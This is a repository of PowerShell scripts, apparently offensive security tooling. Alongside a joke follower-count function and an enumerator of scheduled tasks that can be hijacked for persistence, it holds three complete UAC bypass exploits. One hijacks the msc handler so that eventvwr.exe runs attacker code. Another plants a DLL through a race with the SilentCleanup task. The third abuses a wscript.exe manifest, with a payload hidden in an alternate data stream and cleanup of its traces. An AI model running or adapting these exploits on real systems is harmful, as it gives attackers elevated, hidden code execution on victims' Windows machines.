├── README.md ├── Get-Mattifestation.ps1 ├── Get-ScheduledTaskComHandler.ps1 ├── Invoke-EventVwrBypass.ps1 ├── Invoke-DiskCleanupBypass.ps1 └── Invoke-WScriptBypassUAC.ps1 /README.md: -------------------------------------------------------------------------------- 1 | # Misc-PowerShell-Stuff 2 | random powershell goodness 3 | -------------------------------------------------------------------------------- /Get-Mattifestation.ps1: -------------------------------------------------------------------------------- 1 | function Get-Mattifestation { 2 | <# 3 | .SYNOPSIS 4 | Function to calculate a user's mattifestations, the international 5 | standard unit of internet-famousness. 6 | 7 | TODO: -ATD flag to calculate the mattifestations of all ATD users. 8 | 9 | Function: Get-Mattifestations 10 | Author: @enigma0x3, @harmj0y 11 | License: BSD 3-Clause 12 | Required Dependencies: None 13 | Optional Dependencies: None 14 | 15 | .EXAMPLE 16 | Get-Mattifestations -Handle enigma0x3 17 | 18 | .EXAMPLE 19 | "enigma0x3","harmj0y","sixdub" | Get-Mattifestation | Sort-Object Mattifestations -Descending | ft -AutoSize 20 | 21 | .LINK 22 | https://twitter.com/lee_holmes/status/289810790821789696 23 | #> 24 | 25 | [CmdletBinding()] 26 | Param( 27 | [Parameter(Position=0,Mandatory=$True,ValueFromPipeline=$True)] 28 | [string]$Handle 29 | ) 30 | 31 | begin { 32 | try { 33 | $WC = New-Object Net.WebClient 34 | if(($WC.DownloadString("http://twitter.com/mattifestation") -match '([,\d]+).*Followers')) { 35 | [int]$Mattifestation = $Matches[1] 36 | } 37 | } 38 | catch { 39 | throw "Error contacting twitter.com" 40 | } 41 | } 42 | process { 43 | 44 | if(($WC.DownloadString("http://twitter.com/$Handle") -match '([,\d]+).*Followers')) { 45 | [int]$User = $Matches[1] 46 | } 47 | 48 | $Properties = @{ 49 | Handle = $Handle 50 | Mattifestations = [double]("{0:N3}" -f ($User / $Mattifestation)) 51 | } 52 | 53 | New-Object PSObject -Property $Properties 54 | } 55 | } 56 | -------------------------------------------------------------------------------- /Get-ScheduledTaskComHandler.ps1: -------------------------------------------------------------------------------- 1 | function Get-ScheduledTaskComHandler { 2 | <# 3 | .SYNOPSIS 4 | Author: Matt Nelson (@enigma0x3), Matthew Graeber (@mattifestation) 5 | License: BSD 3-Clause 6 | Required Dependencies: None 7 | Optional Dependencies: None 8 | 9 | Checks all scheduled tasks that execute on user logon & have a "Custom handler" set. This will expose 10 | tasks that are able to be abused for userland persistence via COM handler hijacking. 11 | 12 | .EXAMPLE 13 | 14 | PS C:\> Get-ScheduledTaskComHandler 15 | 16 | Return all scheduled tasks with COM handlers. 17 | 18 | .PARAMETER OnLogon 19 | Shows all Tasks that start on logon & associated CLSIDS/DLLs 20 | 21 | .PARAMETER PersistenceLocations 22 | Shows all Tasks that are able to be Hijacked for userland persistence. 23 | 24 | #> 25 | 26 | 27 | [CmdletBinding(DefaultParameterSetName = 'OnLogon')] 28 | param( 29 | [Parameter(ParameterSetName = 'OnLogon')] 30 | [Switch] 31 | $OnLogon, 32 | [Parameter(ParameterSetName = 'PersistenceLocations')] 33 | [Switch] 34 | $PersistenceLocations 35 | 36 | ) 37 | 38 | $ErrorActionPreference = "SilentlyContinue" 39 | $Path = "$($ENV:windir)\System32\Tasks" 40 | $null = New-PSDrive -PSProvider registry -root HKEY_CLASSES_ROOT -Name HKCR 41 | Get-ChildItem -Path $Path -Recurse | Where-Object { ! $_.PSIsContainer } | ForEach-Object { 42 | $TaskName = $_.Name 43 | $TaskXML = [xml] (Get-Content $_.FullName) 44 | if($TaskXML.Task.Actions.ComHandler) { 45 | $TaskTrigger = $TaskXML.Task.Triggers.OuterXML 46 | $TaskXML.Task.Actions.Exec.Command| ForEach-Object { 47 | 48 | $COM = $TaskXML.Task.Actions.ComHandler.ClassID 49 | $dll = (Get-ItemProperty -LiteralPath HKCR:\CLSID\$COM\InprocServer32).'(default)' 50 | $Out = New-Object PSObject 51 | $Out | Add-Member Noteproperty 'TaskName' $TaskName 52 | $Out | Add-Member Noteproperty 'CLSID' $COM 53 | $Out | Add-Member Noteproperty 'Dll' $dll 54 | $Out | Add-Member Noteproperty 'Logon' $False 55 | $null = $TaskXML.Task.InnerXml -match 'Context="(?InteractiveUsers|AllUsers|AnyUser)"' 56 | 57 | $IsUserContext = $False 58 | if ($Matches['Context']) { $IsUserContext = $True } 59 | $Out | Add-Member Noteproperty 'IsUserContext' $IsUserContext 60 | 61 | if($TaskTrigger.Contains('LogonTrigger')){ 62 | $Out.Logon = $True 63 | } 64 | else{$Out.Logon = $False} 65 | 66 | $Context = $null 67 | 68 | if($OnLogon){ 69 | if ($Out.Logon) { 70 | $Out 71 | } 72 | } elseif($PersistenceLocations){ 73 | if ($Out.IsUserContext -and $Out.Logon -eq "True") { 74 | $Out 75 | } 76 | } else { $Out } 77 | } 78 | } 79 | } 80 | } 81 | -------------------------------------------------------------------------------- /Invoke-EventVwrBypass.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-EventVwrBypass { 2 | <# 3 | .SYNOPSIS 4 | 5 | Bypasses UAC by performing an image hijack on the .msc file extension 6 | Expected to work on Win7, 8.1 and Win10 7 | 8 | Only tested on Windows 7 and Windows 10 9 | 10 | Author: Matt Nelson (@enigma0x3) 11 | License: BSD 3-Clause 12 | Required Dependencies: None 13 | Optional Dependencies: None 14 | 15 | .PARAMETER Command 16 | 17 | Specifies the command you want to run in a high-integrity context. For example, you can pass it powershell.exe followed by any encoded command "powershell -enc " 18 | 19 | .EXAMPLE 20 | 21 | Invoke-EventVwrBypass -Command "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc IgBJAHMAIABFAGwAZQB2AGEAdABlAGQAOgAgACQAKAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAnAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAJwApACkAIAAtACAAJAAoAEcAZQB0AC0ARABhAHQAZQApACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAQwA6AFwAVQBBAEMAQgB5AHAAYQBzAHMAVABlAHMAdAAuAHQAeAB0ACAALQBBAHAAcABlAG4AZAA=" 22 | 23 | This will write out "Is Elevated: True" to C:\UACBypassTest. 24 | 25 | #> 26 | 27 | [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')] 28 | Param ( 29 | [Parameter(Mandatory = $True)] 30 | [ValidateNotNullOrEmpty()] 31 | [String] 32 | $Command, 33 | 34 | [Switch] 35 | $Force 36 | ) 37 | $ConsentPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin 38 | $SecureDesktopPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).PromptOnSecureDesktop 39 | 40 | if($ConsentPrompt -Eq 2 -And $SecureDesktopPrompt -Eq 1){ 41 | "UAC is set to 'Always Notify'. This module does not bypass this setting." 42 | exit 43 | } 44 | else{ 45 | #Begin Execution 46 | $mscCommandPath = "HKCU:\Software\Classes\mscfile\shell\open\command" 47 | $Command = $pshome + '\' + $Command 48 | #Add in the new registry entries to hijack the msc file 49 | if ($Force -or ((Get-ItemProperty -Path $mscCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){ 50 | New-Item $mscCommandPath -Force | 51 | New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null 52 | }else{ 53 | Write-Warning "Key already exists, consider using -Force" 54 | exit 55 | } 56 | 57 | if (Test-Path $mscCommandPath) { 58 | Write-Verbose "Created registry entries to hijack the msc extension" 59 | }else{ 60 | Write-Warning "Failed to create registry key, exiting" 61 | exit 62 | } 63 | 64 | $EventvwrPath = Join-Path -Path ([Environment]::GetFolderPath('System')) -ChildPath 'eventvwr.exe' 65 | #Start Event Viewer 66 | if ($PSCmdlet.ShouldProcess($EventvwrPath, 'Start process')) { 67 | $Process = Start-Process -FilePath $EventvwrPath -PassThru 68 | Write-Verbose "Started eventvwr.exe" 69 | } 70 | 71 | #Sleep 5 seconds 72 | Write-Verbose "Sleeping 5 seconds to trigger payload" 73 | if (-not $PSBoundParameters['WhatIf']) { 74 | Start-Sleep -Seconds 5 75 | } 76 | 77 | $mscfilePath = "HKCU:\Software\Classes\mscfile" 78 | 79 | if (Test-Path $mscfilePath) { 80 | #Remove the registry entry 81 | Remove-Item $mscfilePath -Recurse -Force 82 | Write-Verbose "Removed registry entries" 83 | } 84 | 85 | if(Get-Process -Id $Process.Id -ErrorAction SilentlyContinue){ 86 | Stop-Process -Id $Process.Id 87 | Write-Verbose "Killed running eventvwr process" 88 | } 89 | } 90 | } 91 | -------------------------------------------------------------------------------- /Invoke-DiskCleanupBypass.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-UACBypass { 2 | <# 3 | .SYNOPSIS 4 | 5 | Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy. 6 | 7 | Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3) 8 | License: BSD 3-Clause 9 | Required Dependencies: None 10 | Optional Dependencies: None 11 | 12 | .PARAMETER DllPath 13 | 14 | Specifies the path to the DLL you want executed in a high integrity context. Be mindful of the architecture of the DLL. It must match that of %SystemRoot%\System32\Dism\LogProvider.dll. 15 | 16 | .EXAMPLE 17 | 18 | Invoke-UACBypass -DllPath C:\Users\TestUser\Desktop\Win10UACBypass\PrivescTest.dll 19 | 20 | .EXAMPLE 21 | 22 | Invoke-UACBypass -DllPath C:\Users\TestUser\Desktop\TotallyLegit.txt -Verbose 23 | 24 | The DllPath can have any extension as long as the file itself is a DLL. 25 | #> 26 | 27 | [CmdletBinding()] 28 | [OutputType([System.IO.FileInfo])] 29 | Param ( 30 | [Parameter(Mandatory = $True)] 31 | [String] 32 | [ValidateScript({ Test-Path $_ })] 33 | $DllPath 34 | ) 35 | 36 | $PrivescAction = { 37 | $ReplacementDllPath = $Event.MessageData.DllPath 38 | # The newly created GUID folder 39 | $DismHostFolder = $EventArgs.NewEvent.TargetInstance.Name 40 | 41 | $OriginalPreference = $VerbosePreference 42 | 43 | # Force -Verbose to display in the event 44 | if ($Event.MessageData.VerboseSet -eq $True) { 45 | $VerbosePreference = 'Continue' 46 | } 47 | 48 | Write-Verbose "DismHost folder created in $DismHostFolder" 49 | Write-Verbose "$ReplacementDllPath to $DismHostFolder\LogProvider.dll" 50 | 51 | try { 52 | $FileInfo = Copy-Item -Path $ReplacementDllPath -Destination "$DismHostFolder\LogProvider.dll" -Force -PassThru -ErrorAction Stop 53 | } catch { 54 | Write-Warning "Error copying file! Message: $_" 55 | } 56 | 57 | # Restore the event preference 58 | $VerbosePreference = $OriginalPreference 59 | 60 | if ($FileInfo) { 61 | # Trigger Wait-Event to return and indicate success. 62 | New-Event -SourceIdentifier 'DllPlantedSuccess' -MessageData $FileInfo 63 | } 64 | } 65 | 66 | $VerboseSet = $False 67 | if ($PSBoundParameters['Verbose']) { $VerboseSet = $True } 68 | 69 | $MessageData = New-Object -TypeName PSObject -Property @{ 70 | DllPath = $DllPath 71 | VerboseSet = $VerboseSet # Pass the verbose preference to the scriptblock since 72 | # event scriptblocks will not automatically honor -Verbose. 73 | } 74 | 75 | $TempDrive = $Env:TEMP.Substring(0,2) 76 | 77 | # Trigger the DLL dropper with the following conditions: 78 | # 1) A directory is created - i.e. new Win32_Directory instance 79 | # 2) The directory created is created under %TEMP% 80 | # 3) The directory name is in the form of a GUID 81 | $TempFolderCreationEvent = "SELECT * FROM __InstanceCreationEvent WITHIN 1 WHERE TargetInstance ISA `"Win32_Directory`" AND TargetInstance.Drive = `"$TempDrive`" AND TargetInstance.Path = `"$($Env:TEMP.Substring(2).Replace('\', '\\'))\\`" AND TargetInstance.FileName LIKE `"________-____-____-____-____________`"" 82 | 83 | $TempFolderWatcher = Register-WmiEvent -Query $TempFolderCreationEvent -Action $PrivescAction -MessageData $MessageData 84 | 85 | # We need to jump through these hoops to properly capture stdout and stderr of schtasks. 86 | $StartInfo = New-Object Diagnostics.ProcessStartInfo 87 | $StartInfo.FileName = 'schtasks' 88 | $StartInfo.Arguments = '/Run /TN "\Microsoft\Windows\DiskCleanup\SilentCleanup" /I' 89 | $StartInfo.RedirectStandardError = $True 90 | $StartInfo.RedirectStandardOutput = $True 91 | $StartInfo.UseShellExecute = $False 92 | $Process = New-Object Diagnostics.Process 93 | $Process.StartInfo = $StartInfo 94 | $null = $Process.Start() 95 | $Process.WaitForExit() 96 | $Stdout = $Process.StandardOutput.ReadToEnd().Trim() 97 | $Stderr = $Process.StandardError.ReadToEnd().Trim() 98 | 99 | if ($Stderr) { 100 | Unregister-Event -SubscriptionId $TempFolderWatcher.Id 101 | throw "SilentCleanup task failed to execute. Error message: $Stderr" 102 | } else { 103 | if ($Stdout.Contains('is currently running')) { 104 | Unregister-Event -SubscriptionId $TempFolderWatcher.Id 105 | Write-Warning 'SilentCleanup task is already running. Please wait until the task has completed.' 106 | } 107 | 108 | Write-Verbose "SilentCleanup task executed successfully. Message: $Stdout" 109 | } 110 | 111 | $PayloadExecutedEvent = Wait-Event -SourceIdentifier 'DllPlantedSuccess' -Timeout 10 112 | 113 | Unregister-Event -SubscriptionId $TempFolderWatcher.Id 114 | 115 | if ($PayloadExecutedEvent) { 116 | Write-Verbose 'UAC bypass was successful!' 117 | 118 | # Output the file info for the DLL that was planted 119 | $PayloadExecutedEvent.MessageData 120 | 121 | $PayloadExecutedEvent | Remove-Event 122 | } else { 123 | # The event timed out. 124 | Write-Error 'UAC bypass failed. The DLL was not planted in its target.' 125 | } 126 | } 127 | -------------------------------------------------------------------------------- /Invoke-WScriptBypassUAC.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-WScriptBypassUAC 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe. 7 | 8 | Author: @enigma0x3, @harmj0y, Vozzie 9 | License: BSD 3-Clause 10 | Required Dependencies: None 11 | Optional Dependencies: None 12 | 13 | .DESCRIPTION 14 | 15 | Drops wscript.exe and a custom manifest into C:\Windows and then proceeds to execute VBScript using the wscript executable 16 | with the new manifest. The VBScript executed by C:\Windows\wscript.exe will run elevated. 17 | 18 | .PARAMETER payload 19 | The code you want wscript.exe to run elevated. Put the full command in quotes. 20 | 21 | .EXAMPLE 22 | Invoke-WScriptBypass -payload "powershell.exe -ep Bypass -WindowStyle Hidden -enc " 23 | 24 | .LINK 25 | http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html 26 | https://github.com/Vozzie/uacscript 27 | #> 28 | 29 | [CmdletBinding()] 30 | Param( 31 | [Parameter(Mandatory=$True)] 32 | [string] 33 | $payload 34 | ) 35 | 36 | function Local:Get-TempFileName { 37 | #Generate Temporary File Name 38 | $sTempFolder = $env:Temp 39 | $sTempFolder = $sTempFolder + "\" 40 | $sTempFileName = [System.IO.Path]::GetRandomFileName() + ".tmp" 41 | $sTempFileName = $sTempFileName -split '\.',([regex]::matches($sTempFileName,"\.").count) -join '' 42 | $sTempFileNameFinal = $sTempFolder + $sTempFileName 43 | return $sTempFileNameFinal 44 | } 45 | 46 | function Local:Invoke-CopyFile($sSource, $sTarget) { 47 | # Cab wscript, send to temp and then extract it from temp to $env:WINDIR 48 | $sTempFile = Get-TempFileName 49 | Start-Process -WindowStyle Hidden -FilePath "$($env:WINDIR)\System32\makecab.exe" -ArgumentList "$sSource $sTempFile" 50 | $null = wusa "$sTempFile" /extract:"$sTarget" /quiet 51 | 52 | # sleep for 2 seconds to allow for extraction to finish 53 | Start-Sleep -s 2 54 | 55 | # remove the temp files 56 | Remove-Item $sTempFile 57 | } 58 | 59 | function Local:Invoke-WscriptTrigger { 60 | 61 | $VBSfileName = [System.IO.Path]::GetRandomFileName() + ".vbs" 62 | $ADSFile = $VBSFileName -split '\.',([regex]::matches($VBSFileName,"\.").count) -join '' 63 | 64 | $VBSPayload = "Dim objShell:" 65 | $VBSPayload += "Dim oFso:" 66 | $VBSPayload += "Set oFso = CreateObject(""Scripting.FileSystemObject""):" 67 | $VBSPayload += "Set objShell = WScript.CreateObject(""WScript.Shell""):" 68 | $VBSPayload += "command = ""$payload"":" 69 | $VBSPayload += "objShell.Run command, 0:" 70 | 71 | # stupid command to kick off a background cmd process to delete the wscript and manifest 72 | $DelCommand = "$($env:WINDIR)\System32\cmd.exe /c """"start /b """""""" cmd /c """"timeout /t 5 >nul&&del $($env:WINDIR)\wscript.exe&&del $($env:WINDIR)\wscript.exe.manifest""""""""" 73 | $VBSPayload += "command = ""$DelCommand"":" 74 | $VBSPayload += "objShell.Run command, 0:" 75 | $VBSPayload += "Set objShell = Nothing" 76 | 77 | "[*] Storing VBS payload into `"$env:USERPROFILE\AppData:$ADSFile`"" 78 | $CreateWrapperADS = {cmd /C "echo $VBSPayload > ""$env:USERPROFILE\AppData:$ADSFile"""} 79 | Invoke-Command -ScriptBlock $CreateWrapperADS 80 | 81 | "[*] Executing VBS payload with modified scripting host" 82 | $ExecuteScript = {cmd /C "$($env:WINDIR)\wscript.exe ""$env:USERPROFILE\AppData:$ADSFile"""} 83 | Invoke-Command -ScriptBlock $ExecuteScript 84 | 85 | "[*] Removing Alternate Data Stream from $("$env:USERPROFILE\AppData:$ADSFile")" 86 | Remove-ADS $env:USERPROFILE\AppData:$ADSFile 87 | } 88 | 89 | function Local:Invoke-WscriptElevate { 90 | 91 | $WscriptManifest = 92 | @" 93 | 94 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | true 107 | true 108 | 109 | 110 | 111 | "@ 112 | 113 | # Copy and apply manifest to wscript.exe 114 | $sManifest = $env:Temp + "\wscript.exe.manifest" 115 | $WscriptManifest | Out-File $sManifest -Encoding UTF8 116 | 117 | "[*] Cabbing and extracting manifest into $($env:WINDIR)" 118 | Invoke-CopyFile $sManifest $env:WINDIR 119 | 120 | "[*] Cabbing and extracting wscript.exe into $($env:WINDIR)" 121 | $WScriptPath = "$($env:WINDIR)\System32\wscript.exe" 122 | Invoke-CopyFile $WScriptPath $env:WINDIR 123 | Remove-Item -Force $sManifest 124 | 125 | # execute the payload 126 | Invoke-WscriptTrigger 127 | } 128 | 129 | function Local:Remove-ADS { 130 | <# 131 | .SYNOPSIS 132 | Removes an alterate data stream from a specified location. 133 | P/Invoke code adapted from PowerSploit's Mayhem.psm1 module. 134 | Author: @harmj0y, @mattifestation 135 | License: BSD 3-Clause 136 | .LINK 137 | https://github.com/mattifestation/PowerSploit/blob/master/Mayhem/Mayhem.psm1 138 | #> 139 | [CmdletBinding()] Param( 140 | [Parameter(Mandatory=$True)] 141 | [string]$ADSPath 142 | ) 143 | 144 | #region define P/Invoke types dynamically 145 | # stolen from PowerSploit https://github.com/mattifestation/PowerSploit/blob/master/Mayhem/Mayhem.psm1 146 | $DynAssembly = New-Object System.Reflection.AssemblyName('Win32') 147 | $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) 148 | $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32', $False) 149 | 150 | $TypeBuilder = $ModuleBuilder.DefineType('Win32.Kernel32', 'Public, Class') 151 | $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String])) 152 | $SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError') 153 | $SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, 154 | @('kernel32.dll'), 155 | [Reflection.FieldInfo[]]@($SetLastError), 156 | @($True)) 157 | 158 | # Define [Win32.Kernel32]::DeleteFile 159 | $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('DeleteFile', 160 | 'kernel32.dll', 161 | ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), 162 | [Reflection.CallingConventions]::Standard, 163 | [Bool], 164 | [Type[]]@([String]), 165 | [Runtime.InteropServices.CallingConvention]::Winapi, 166 | [Runtime.InteropServices.CharSet]::Ansi) 167 | $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute) 168 | 169 | $Kernel32 = $TypeBuilder.CreateType() 170 | 171 | $Result = $Kernel32::DeleteFile($ADSPath) 172 | 173 | if ($Result){ 174 | Write-Verbose "Alternate Data Stream at $ADSPath successfully removed." 175 | } 176 | else{ 177 | Write-Verbose "Alternate Data Stream at $ADSPath removal failure!" 178 | } 179 | } 180 | 181 | #make sure we are running on vulnerable windows version (vista,7) 182 | $OSVersion = [Environment]::OSVersion.Version 183 | if (($OSVersion -ge (New-Object 'Version' 6,0)) -and ($OSVersion -lt (New-Object 'Version' 6,2))){ 184 | if(([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") -eq $True){ 185 | Write-Warning "[!] You are already elevated!" 186 | } 187 | else { 188 | Invoke-WscriptElevate 189 | } 190 | }else{Write-Warning "[!] Target Not Vulnerable"} 191 | } 192 | --------------------------------------------------------------------------------